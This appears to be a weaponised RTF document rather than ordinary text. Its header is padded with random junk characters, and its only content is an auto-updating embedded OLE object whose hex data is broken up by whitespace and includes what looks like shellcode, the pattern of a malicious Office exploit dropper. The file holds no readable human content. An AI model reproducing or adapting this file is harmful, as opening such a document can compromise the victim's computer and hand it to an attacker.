{\rtf9['%)_7°[2%>°60'?'9[&!~+@!/.$%9%]?_µ202#<§79_:+#?+_[],01?µ_6?§§4>1~^%°6:;(7~*%2&9(.?=3?-°|*7*~?'&],>'`~:?8=9%>0>;6?5§(+]~?-µ'µ8??_%96;')+/5?(6&@?8?<7,,'3:?@7=*?§?6+2-/?2^§84µ?2[+(`6?.^0~%|>'%5__?µ|;/(/@+§?,',0%1>;+98|?86)1'%.<])`(;5*#|#(==]^?^)]???_!!:|2<>&~;.?7§[[)8??>%:87§?!|)-<?+§:`%'=%[%`[[6?%µ4§#%=3?%_?=?>;.|2§!<#?8@°@&%µ°7&$9<*`&8.8?*%?0%8%%%#?§)@%@>|'4+|:](7/.-]~`§?-~0?§§+|*;@?>??3?0^-<?`?9%?^]<;3]1µ]5$))*µ??^],µ%,##°!]1µ?23,%,(6#_6%%&+!.>*§(/*0>?+9?@7?]:`°6[-??.?4[?<&54[??,°^^5(?03?*>-42@`3#]')-0@@:;-*[>?59:.]%_8~+]@$?#°?°?;&|4[++`_+-`µ6@%&9=5?%!?/0-3)$->?%?303`[°:5%.]_>`7|=;9:;0=0>|/88?:4]???65.(#6960?5_[&5,?µ`$$§0,1<|72$§*&=?>%-2.)9:2%_!1|;:<8?8??86'~2$][6%)2@~=_°)+?/;:>@=,/#_%0%?9#µ|?:><=][>8§@60;:/7`??3968#!?]&[?@%^$4`]1]9°°9-?$'µ73_*7?|`[~?2~!=<?41.)°§1%%@/=)<8=21[µ=^]8+°]??|3&+9%2?^^`]§>?9(4~%,_??§µ5^%^8!8],0>_?^>9=%@§2~%@~]0;/0/0&?*5$?6'?5$#!6!61<>%=746$/(,~=-<@&,65?/?8?48)6?>$??§[):$!|~?&>[/!58%&)^2:?9=?|°20_&:7<<`&7?`?8]!=57§.5??)'?=+&§'#.`<@|?^'/).??.=$@[6/$)=°4*^_.@°_%,|^]?^;@0+#µ,+,0'#~$3#@?)%$26@(6?-)??^`~:%'?[?&+]#^8?/1$?+[`µ18>?<µ4900-<]]%,*!@|<7!?1%4(6???~1!0,µ_#3~2|^§??/|?;[`21:4),?&^4?.#*=-!3/9&1?µ?6!%==[3??,(7!'|='>?>^+@95?^4,&/;>+%6>)4)49?|-§*_|]?0'~*_.&)?=3°&),&_$0~µ?<2&.§?:?,??<#|]<=`/5|,90-~~'0_+431<#-*`?4&/;?6%??<58?1[.?)6).?2,&.6?%@|°1@4_&?(8`&0%]?=%5>.?`9?µ+-[?7|'6?~0_=9µ)@0?(~[&?#@&?=1%;67?/^+.%^1?!&.11&;[2*#5@)§`5?+$°+&]+~2?[;:§1$2^3?/~*#*%~µ[?`0°2??.?<9)26.<;@'=2/?5&[;6$?,@%?µ@1%µ@@!%>§*5_>8°>#^[&?4='92,:1%µ8&^?_:'µ?39%+°1?*1'~§@$&)>:*?;4>0µ:#µ#.43)&(`%?%9<?4?:#:20°7*7?82?§5)_].9%00_7µ[,0$?|)%=?°7-['|*+[<^<-%6?~;?6_:3>[9~~-&3948?+µ]4%!`09'|^]-,>`,~/;]`.&8+,?$]5#$_#|§]8''??)23[0,8?'@4]-?;`?4462=#@`%;6?^@|%%8~|3.:^0+!.1,#!<[>;.!'#)-~-8`[/2/[7[_70*,]>6&:`,^°!'-3!'*57[>!%;??[?]+4_%|0,&(@'?%#=+;%_^)=./>^'&$9!$^8>'*@,§§,.°%6%8*/_@#5:?];#1]#?$*72,<#/:)$>*8@$0?-??;?'5?_^+>'°%8=)(~?&3><?@?3!°9,§[%#0?7(%`;°~?.-1@295<??~°>?3=0_?%^?°|5&?[??557||5?0µ'5.0~.!$°4µ]-!%9°1??&)=/~64)2:!]+_2^_<@)|*#=*~`?`*!2+|-/`6+6|[?µ)_5?@[!0+_;/@*°/`)@{\object\objautlink\objupdate\objw7157\objh557{\*\objdata 31b3861
e0 20000 0014 0000 0
051 3 0	38656354
4	d384b6	6
4
b7	8 653443 584 8
5
830000 000 0 0000
0
0 0 0
000
001 0 00
00
d0	c	f11e
0a1	b1 1a e 10	000	0	0	0	00	000	00 000 00 00	00 000 00 00	003	e000	3	0	0fef	f0
9	0	0060000
00	00000	0 0	0	00 00
0000010000	00	010	00	000	0000 0 00 0001	00 0000 200
00
00
0
1
00
0000
f e ff	ff f
f0 000 0	0	00
0 0	00000 0fffffff ffffff fffff ffff ffff	f	ffff ff f ffff fff fff ffffffff f f ffff fffffff	fffffff	fffffffff
f
f	f	ff	ff	f
fffff	fffff	ffffff	fff	fff	ff
fff	f ff
ffffffffffff	ff	fff	f ffff ff ff
f
f	fff
ffff	fffff	f
ffff
f ff
f
ffffffffff fffffffffff	fffff	ff ffff	fffff fff
f
fff
f
ff
f ff	f	ff	f
f	f	ffffffff
ff	ffff
ff
ff	ffff
ffff
fff ff
fffff
ff
f
ffffff fffff fff	ffffffff	f
ffffff f
f
f f ff f
f
ff
ff f ff fff f fff
fff
ff ff f ffff
ff
f	fffff	f f f
ff f f	f	ff
fff
f	ffff	f	f	ffff	ffff	fffff f fffff fff ff	ffff	ff
f	f
ff
ff	ffffff f
f
ff fff
f
fffff f	ffff	f	f	ff
ff f
f
ff
f
ff f
f f ffffff
fff fffffff	fff fff ffff ffffffff
ff f ffffff
f
f fff
ff
fff ff f fffffffff	ffff	fffffff	fffff ffff
f
f f	f	ffff	f
fffff fff ff f
f ff
f
fffff ff fff ff f fff
ff f	ff
f
f
ffff	ffff	f fff
fffff f
f
f ff f f	ffffff	fff	ffff	ff ff	ff	fff	ffffff	f
ffffff
fff
ff
ffff	ff	ffffffffffff fffffffffffffff	ff
fff	fff f f
ff
fff
fffffff	f	f	ffff	f f fffff	f f	ffff	fff f ff fff f	ffffff	ff fffffffffffff	ffff	fffff	ffff	ff f	f
f	fffff
f	fff ffffffffffff ff
ff	f
f
fff	ff
f fffff f f
f
ffffff ffffffffffff
ff f
fff fff f
f f f ff
ff	f ff
f	fff
ff
ff
f
f	ff
ffffff	ff
f	f
ff
fffff
f
ff
ffff f dff	ffff	f ef
f	f	f ff f eff f
fff0	4
0	0
0
000
0	5 0000000	600
00	00	fe	f	ffff fff f f	f f
ffffff fffff
ffffffffff ff
ff	ff	ff	ff	f
f
ff
ff
ff fffff fffff fff f ffff f ffffff
ff fff	f	f
f
f	fff
f
fffff	ff fffffff
f f
f
f fffff	ffff fff fff	f	ffff ff
ff f f
f	f	f	f
ff f
ff f	fffffffffffffff	ffffff
f
f	f	f
f fff
f
ff
f f
fff ffffff ffffff
ffffff	f
f	f
f
f	f	fff	fff
f
ff
fff
fff	ffffff	fff
ffff
ff
ff
f	f
f	fffffff	ffffff
ff
f
ff	ff fff f fffffffff
f
ffffffff fff ff	f ff ffff	ffffffff fff ffff fffff f f
ffff ffff ff ffff	f ff fff f
f
fff
ff f ff
f
ff
f
fff f	f
ffff
f
f
fff
fff
ffff	ff f ffffffffff	ff	fff ff
ff
f ffff
f	ff	fff fff f
fffffffff	ff f	f
ff
ff
fffffff ff
fff	f	ff
f
f
f
ffffffffff	fff f	ff	fffffff	f f fff ff
f
f	ff
ffff
fff
fff ffffff
ff
ff	ff	fffffff
ff	ff
ff ff
ff	fffff	fff	fff	f
f	f
fffff
ffff	fff
f f
ff
ff f
ffffff	ffff	f
f	ff
f f
ff fff	fff	fff fff
f
ffff
ff f
ff ffff fff ffffff
ffff fff ff fff
fffff ff f	f	f	ff	fff	fff f f ffff f ff
ff f
ff
ffff fffffff fff	ff	ff fff ff
f f f
fffff
ffff f
f	ff
ff	fffffff	ff	ff	f fff ff f f ffffffff f ff ffffff	ffff	ffffff
ff
ff	fffff	f	ff
ff ff	ffff	ff	ff	fff	f	f
ff
ffff	fffffff	ffff	f	ffffff fff
ffff
ff f fff f
fff f f fff fff
fffffffffff
fffff ff ff	f	f	f
ff	ff
f ff
ff	ff
fffffffff	fff f ff ff f
f	f
f	f fffff ffff f f ff
f ffffff fff	f ffff	ff fff	ffff	ff	f	ff
f
ffffff
fffff f
fffff
f ff f f f
f
fff ff f ff	f	ff f
fff	f
ff fff
f f
f
f fff	ffff
ff
fff f ff
f5 2006f006f0074002	0004	500	6e0
07	4	00720	0	7	9000000
0
000000	00 0 0000 0000000 0
00
00
00	0
0 00
0	0000
00	00
0000	00
00
0	00 00000 00	00000000 0000000
00
00
00 00 0016 0	00500fff	ff	fff fff
f ff ff01 0 00
0 0
00
2ce
0
2 0
00 000
0000	c00000
00 00
0 0004
600 00 00 00 000 0 0 00000 0 000 00b0 7
59
c 1
e c c22d 401
03
0000 0
0 400 7
0 0
0 000 00 0
0 0 00
1
00
4f006
c 006
5 0
031 0030 004e
0 0	6	10
0
7	40
06 9
0076 0 0 6 5000 000
00	0	000	00	0000000
000	0 0	00000	0	0	000	00	0000000000000 00000 000 0 000 0 00 0 0	0	0000	00	0	00	0	000	1a	0	0	02 01f ff ffff
fffff f
ff
f fff
ff
f
ff0 00000000	00	0
00	000	0
000	0	00	00
0	0000	0
0	00
000
00
00000000 0 00
000000000 00	0000000	000	000	00
0
00340 700 0 0000000000 0	00	000000000000	00
00
0 000 00000 00 0
0000 000	000000
00	0 0 0	0
00 0000000
000000000000
00 000000 00 000
0
000000	00 000 0	00000	0	0	000	0
00 00 0000 0
0	0000000000	00
0 00
00f
ff	fff
f
f	f	f
f	f	ffff ffff fff
f 0 00	0
0
0 00 0	0	0
000	00
0
00
00
0
0000	0
0	000	0
0
0	00000
0	00	0	0
0	00
00
0	0000	0	0
000	000000	0
00	000000
0
0000000000
0
0000	00	0
00
0000	000000
000	00
0	0	0
000
00000 00000 0 0000 0000 0
0	0	00000
00
0
0000000 0 000000000000 0 0000000000	000000	00	0 00 000 000 0 0000000000000 000	00	00000 0 0000000000000fff ffffffffffffff fff fff	f0 000000	000	0000000 00
0
000000	0 00 0000
000
00
000 00000
0000	0	00	0 00000000000 000 0000 0 00000 000
00
00000000000 0001000	000020000 000
300000 00400 0	0000	500	00000600
00000
70
00
00	00
8
0	00
0	0	0
09
000000 0a
00 0	0
000b 00000 0
0c00 00 0
00d00
00 000e
000 00
00
f00 0	000100 0000 0	11000000	120 000001300
0 00	0140000
0	0150
00000 1 6000 0
0 017 00 0 0001 80
0 0 00019 0 00 0001 a 0000 001b
000 0 0 01
c00
0
0 00feffff fff f f
f	f
ff
ff	fff
ffffffff ff ff f f f ff
ffffff
ffff
f ff	ff
ff
ff fff ff
ff f
ff
ff fffff ffff
ff
ffff
fff
fff ff f
ff f f	fff	f	fffffff	ffff
f	f
fff	fffffff
f	ff	ff	f
ff	f
ff	fffffff
ff	ff	ffffff	ff
ff
f
f	f	ffff	f
ffff	f
ffffffffff f
ff	f	fff	fffff	f	ff	f
ff fff
ffff ff fffff fff	ff
ffffffffff	f f	fffffffff	ff ffffff ffff f ff fff	ff	fff
fffffff	ffff	f
fff	fff	fffffffff	fffff
f	fff
f	ff	f
fff	ff
f
ff	ff	f
fff	ffff	fffff
ff	f	f	fffff	ff	ff	fff	f fffffffffff ffffffff ff fff	ff fffff f
ff f	f ffffff	ffff ffff fffffff
ff ff ffff
f fff ff f ffff	ff fffff	f fffff
f ff f
fffffff	fffffffffffff
f
f
fff
ff	f	f	fff	fff	f	f	f	f	f	ffff
f	ffff	ff	ffffffff ffff f ffff f ff ffff f f
ff ff
fff	ffffffffffffff ffff fffff	ff	ffffffff f
f	f f
f
ffff	fffffffffff	ffffff
ff	ff	f	f
f	fffff	f	ffff
ff	fff	ffff
f	fff
ff	f	fff
f	f	fff
ff	f
ff	f	f	f
ff
fffff ff fff	ff	ffff f ff
ff ff	ff
f
ffffffff
fff
f	fffff ffff f
fffff f ff
f
f ff
f ff f	ff	f	ff
f
ff	f
f	f
f	ffff	ff
fff
f	ff	ff
ffff ffff	f	ff	f	ffff	f	f	fffffff	f
f
f
ff f fff ffffff	f	ffffff
fff	ff
ff
fff
f
ff ff	fff
ffff fff	f
ff f fff	fffff	30070	0	00	02a90135 1e 0a 0108 54bb	b
d	2	92	5cc4	6	8
1edfb6	78646 8 b	4 d
0
e8b11b
8f37
7	d667	25bc6747
8
08b	18	52	f	fd30	5	9
c8b198	8055e75e6	7	7 ff e 08e59c 642
00
c2 a042 0d 2ec 64c842a49d 0ff f68 ccdc6 2 d
87e3	c5a	5d	ce db3a6b f d
9c 0 a77
0	86486cfb	e	0 e8	f	43660d06 6e9c1cbdedcf1ba
03f b	1	aa
11	6	f	af0	e	1 ee1
4
5
a
5 a99 4
2
c
b7	1
9	6	b38	6d
55
d3	2cce	69
1c86	aa	0 5
3f
3ab03b e 8977 363c39db ef3
dd
3
0 86
9caa83ad	ac732f	3	489	9e	4
022c
bdd	9	d
e9
f
e	31
6
9 4 4
69
6
c57dfa a0 0f 8 66a	1be3	8 3 d6	e3	f9100	c
ec4	671340e 1 e c 6	c5
e
272
42e
b
d	02c1
66
d	3	9
33	c	76	58
2	1e
a1
1
a7
f0
af386be	af66	c	d	ec9e6	794
d
3
c
fb325 f94c4a
32 94 b eeea6
4 7
3	4
7	ef0d72	e af8	ed8f
5	a0686a65a0b3e
9	21	01 0 0 0
0a d1 801
b
f2 4
9 62e25f 43d 37 1 65bb935	4e5da	5a49e01d	3
a
427 8e 8a3
aa
2 d7c08 e9	9
68
62
2ca cde9646cf0eec ed8	65	a	b1	5b3	1	e	120	2 c
3 dcb aaa16c 8236de	16f	4
5
c296
7d	5aa	329 ed8 e	1
474
ef
a 379d9db
8948 a8	956	d5cf2	0	160
d	c7	c 587
bf
ba
6 eb 42	7
0e
ea72 7090	1395fbb	2 2 0	38	9fc5d8
f
9e 5 4
3 d6
3 a4 a 09c
9
637 e96 b21d a	6
4f2c959	fbba0c13
2c88	e	92 6204ca47a5	e7b9	9	b 2 3 069	912f95
cb	6
327 b
8d	b	7
c36	a1ccf 1 7
43b1 0d3f71	5 8 8 e5096
c2c8a6c882be 1ccf4f4f
58
68	49
6
800852
e	4efc
8 c a3d7ba 9	5	70 ae70	a	dc	2934	f1767
9ad
58
6
15690	0	67	a
3 7b911 3
4f 6	15	0 1df9f	c44	8 a6 4c 4f f12
780 5d06 6841e 1 06 57 5c2 56642138c46 b 81
9d 3a 7 aef
1
ea0c06b 3d1 ee4dd 1
7633
f4
a9
1	e 21d
1fa	d
10 00
6 cb e	aad	c2	6
adeb 5
d
6533d
51f a
61 e7 2 f 107950
81	b
8e4 c 6 996 65	d2	2556
e9770
10	0009c53505	3
0	5aa	4	300	0 005 3c54
0
0 00	81
e
b c2 0
e000 0	5 b9c 5756
53	81c7ae
1
5 000
08 d
b67a3c	00 00 8 d9b0
4650 0008
1c 7eb0a 000081eb204c 0 00
08d
be9e 7800	005b
5e5
f9d585b9d	eb05e9d
70	0 00 0
0	5 eeb4 8eb
07e
9e 90
0 00 00eb	4	4	e
89d	01
000 0
eb
36589c	5
6	8
1c6	4	63	f
0	00081ee	1
34c00	0
08	1c6	4
37500
0	0
5e
9	d5feb15
eb0
7ebcfe9d0 00 000
0 05b51
4
e	f
3c
3
10	6e9d300	0	0	0	0 e9e900	0 000e bede	bc8	8 3c64ce bb5e 9d 7	0 000 009c575
6 5
7
8 1ef da370 0008
1c
7ce7	f00	00	5
f 5e 5 f 5
75f	9
d
eb6a 9c53 57538	d bfe2
5
0 00	0081
c	7 0 2 3	b00	0
0
81ebef 0 d
00 00
908
db b3 2 3c 0000
5b5f 5	b9de98
6	000	0
009c	53	81c3c60f	0000eb0662 f 7637	8a69f8d9b
ac	3 40 00	08d9b095e000	08
1
eb	8
5
110
0 0
05
b 9de
b289c5681e
e2
91d 0
00
081ee
2
2
4 d 0 0
008db
6 2 7
7
d0 0
0 05e 9d
8d 8	f77	fcfff	fe	b
2f
69c08 70c
3a 7
a
e b
3ae b46 e81aff ff f fe 9
0e ff
ff ffe b 06 2 27b d4 e0	f	c4b8
db
e
8	9	030	0006bc	0	00e96a
f	fffff	e929	ffff	f
fe9	01	fff
fffe90	3ffff	f	fe9	18	fffff f eb
0	7eb17	e918f
f
ff ff 83
c60439
fe72
b2eba 8e
9
d4fe ff f
f	57	50eb
8	7
5ec3dd149b3c5c7	c	8d86	f76d	52	7f	ff97c5eb0ae3df	149	7b	a	7
d c 0184dc1	da	8 ecd 1c	3	2720	49ea5
bc375	ed8	40df6	6
fe1	c
e1 c 74fb
1
36848
3	e
b32c
9a	1	a de 211	4e	6	e1	3	6ccc0d3b
7a1f
68
e b9757c
c	1 8
aec4
5ca3
176b 76d2127	e6aa22	9
3	96	d	4
0	b
7	bcafd0ee3 8	9	cba331a4	d
97 6b 09b1192bdc	d1d	c2574e
0
b	5bd	d	9 b d090 0 68f86	5a21fd
58f
0dd ed
9ca9
a	29a8	b	3b7258d
6ae44cd 9 33	f311	1a1f 685 d	d7e0b	5f000
a	d7f5	ab 50 c2dbb
6ac 3
4	7e	54
9d
61	9ef	28
cc	1 7e7	0f	4	84c3ba d96
f3
7
a18
4	816ff	d0	b	4d8	f1	3f2 6 9da1	a 50056 ace8 691
48 1	8	6
4	3b
89
46fa6	c11	7a15c4b 35b 8100	ad e7
b0e 3
bc59d88b96 22	48c
23b	95e9de80c6 defb
b b4	c88e	2
d7
b57ec85	e aa5a7 b
0
e5
c
d4 0
570cfd7298bfc 4
6bd
9 d 7a 3	f	4b e 523	2	2
7f	5 d2d4 5 4bc5c
0f5e ca 81 7 50 2 3	7
5
c	82
27
e5151
5eaa
7bfea
f5
f2 5
2187	f9
ab cd07
5a 51501 0a
09
2e
139b79 e b9 8a
73 0e	5dd	ad 7e1 3	bcde5	776 277c64 09	fd9
0b a
b7
72 5 1	6	6eb
7	a
9 0
9	e	10a
e	4	01	6
7
b	c700	57
fa39	184b	8	78	a9
cd6
71	292
b	9a865a
2b
3a
7	0	6
0
8	c
780e4
f765	26
d	d60	f
d
601d	8	d90
6c01455
c	d
63	0b 86ce 9 3
35dd9 3f0	a4b4a
e
4e
c6
5c27	4860 04
9c 2
0	b
4
b343d8	784	6	63	3
38 9 335
08f38
5
b5235
9 12c	af
1
dadc
0e
7
f4f
a9	4b
233
7ba6 42 c 50
10d
8d23
18 5
f
537 ad 69b1 6 199 8 c	6bb
fac	50
34a 019cd	a61	8
c0 6341722 19 8 97	b	17d00
606
81f19f 7	90	66cc	fadc c15593 1f
8
7ee b c7035
1b99 07 9
6c c9
b
f
e	1
2
c6b
37	631 9c 382 8 9d3
719cd	4
c	d	fd 7
d7	6
c	31	e7
4	845e0ade	b	0ab	b	2	e
168
93
1
9d1
8	4	12
79 78ff
ec 3
cb a3bb
5
7c4 7817	10
5e7 b bc	6e
2d
3c92	c
5c7	d	97	bc9 814e9d554625116b8 d31
d	b	3	a0
8	2
01602d33	11
bb
fb0ed	23720c33
b85
d1ce2
1	6
a9
1 d
b 468f0 52	39
ad09 6
1 01fe4	ca	f
c
36 3 a 3
a9e2	5d	694b6
11e1
302521 d df00
8f3ed
9
2e 93a	ba	3d641d
f5ca1e3	7
852ba8e3d843f20b 1e 3bf 7a	0d
d2 8
cad f 35382b
cb
614
0 48 f3
8 a3	02	7ae936	ced
b1 e
d 5f
6c f 9
7
7	94	55
9 d fc b8a082c6b	10	e9
fe1	c0ef
b
8
4850c	f6	e	7	7910f5a3	9d3db6f5d	c	ad2	20	1	8	fbeea53
6	9	e4f
45	b2	f
3	88e8	90
9	e
c	a9b
db6	3	f0e623a4	d 43cfc	3	3d4e2	a
505
1	1bd	b5cae
2	3
cb d
9	b
f 4f8	0175	2	42	837c	c
0139f1
2	e21296d
4 a 9
b	8
530cd c
3
e260
fd f	e4
3	3	7f1	c	66f 7
91 35cb7
73a756	3ab22
5
4b	9 b28 7 3 0306a1	c
394a4d0	d54b6c
65
5483
2	e
f 81 4 7f4409	b	ea0
7a	c3 d1d 94f15 c7ab74c8 6e
4 b
3
f2db565	dc34076d4ba9084 070	cc66 4ab9 b1 2 67c20593a1a	ed75cc
4	8
e	d
2	d1a1a b d e3bd7 0 3f
660 30b7d	4ba	e	eb3	d4
c	ea c b
a4540f0	f6cb
737
5
ccbdd0b6829084 e ca4a 83 d
f23	87d3 e 321f2
91
6651 ce d
8	60
9b1	ff	9 237 3
3	0e1	df11b
c78e6a34
dc
173
3
76
4282
4
8
f	d0
50	000 00
00	00000000000000000000	00000000000000000000
0
0
000
00 000 0000000	00
0	00	0
0	0	00 0	000
00	0	0
0 00
0	0
00	00	0000000
0	0000
0	00
0	000	00	000
00	0
0	0000000	00 0 000
000	00 00	0
0
00	0 0 00 0000000000 00	00
00 0
0000	00
00
00	00
0 0000000
0	0	000000	0
0
000	0 0000000 0 0 0
00
0 0
00 00 000 000 0 0 00	00 0 00 00000	0	00	00000000000000	0	0000	000
00	0000000000
000
0
0
0 00000000	00
0
0	0	0	0	0000
0
0
00 0 00
0000
0	000000	0 00000 000	000
0	0
0	0	0000000	0000
0	00
00
000 000000 000 000000 0 00 0
000000	00000000000000000 000000
0
0
0
000000
82	10	0b3c	0000
0000}}}